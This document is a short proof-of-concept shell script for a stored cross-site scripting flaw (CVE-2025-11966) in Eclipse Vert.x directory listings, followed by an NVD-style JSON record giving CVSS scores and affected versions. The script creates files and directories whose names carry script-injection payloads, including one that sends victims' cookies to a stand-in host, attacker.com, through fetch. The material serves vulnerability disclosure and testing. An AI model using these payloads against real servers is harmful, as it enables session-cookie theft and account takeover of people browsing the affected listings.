CVE-2025-11966

# CVE-2025-11966 - Eclipse Vert.x Directory Listing Stored XSS PoC # This PoC demonstrates how to exploit the stored XSS vulnerability # in Vert.x's directory listing feature by creating a file/directory # with a malicious name containing HTML/JavaScript injection. # Step 1: Create a file or directory with XSS payload in its name # The payload targets the href and title attributes of the <a> tag # generated by Vert.x's StaticHandler directory listing. # Example malicious filename (for Linux/macOS): # Using " onmouseover attribute injection in the title attribute mkdir 'test" onmouseover="alert(document.cookie)' 2>/dev/null # Or create a file with payload targeting href attribute: touch 'evil"><img src=x onerror=alert(1)>.txt' # Step 2: Access the directory listing page # When a victim navigates to the directory listing URL, the payload # executes in their browser context. # # Example URL: http://target-server/path/to/directory/ # Step 3: More sophisticated payload for cookie stealing: # Create directory name that exfiltrates session cookies # Note: Adjust the attacker-controlled server URL PAYLOAD='test" onmouseover="fetch("http://attacker.com/steal?c="+document.cookie)' mkdir "$PAYLOAD" # Step 4: Cleanup # rm -rf "$PAYLOAD" # rm -f 'evil"><img src=x onerror=alert(1)>.txt'

{"cve": {"id": "CVE-2025-11966", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:31.730", "lastModified": "2026-01-20T19:31:35.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eclipse Vert.x versions [4.0.0, 4.5.21] and [5.0.0, 5.0.4], when \"directory listing\" is enabled, file and directory names are inserted into generated HTML without proper escaping in the href, title, and link attributes. An attacker who can create or rename files or directories within a served path can craft filenames containing malicious script or HTML content, leading to stored cross-site scripting (XSS) that executes in the context of users viewing the affected directory listing."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:vert.x:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.5.22", "matchCriteriaId": "78323EAC-F580-4CFC-AC88-A36A6D466875"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:vert.x:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.5", "matchCriteriaId": "1BA9AC40-ED8B-4031-A4EF-BC798A732173"}]}]}], "references": [{"url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/303", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory", "Exploit"]}]}}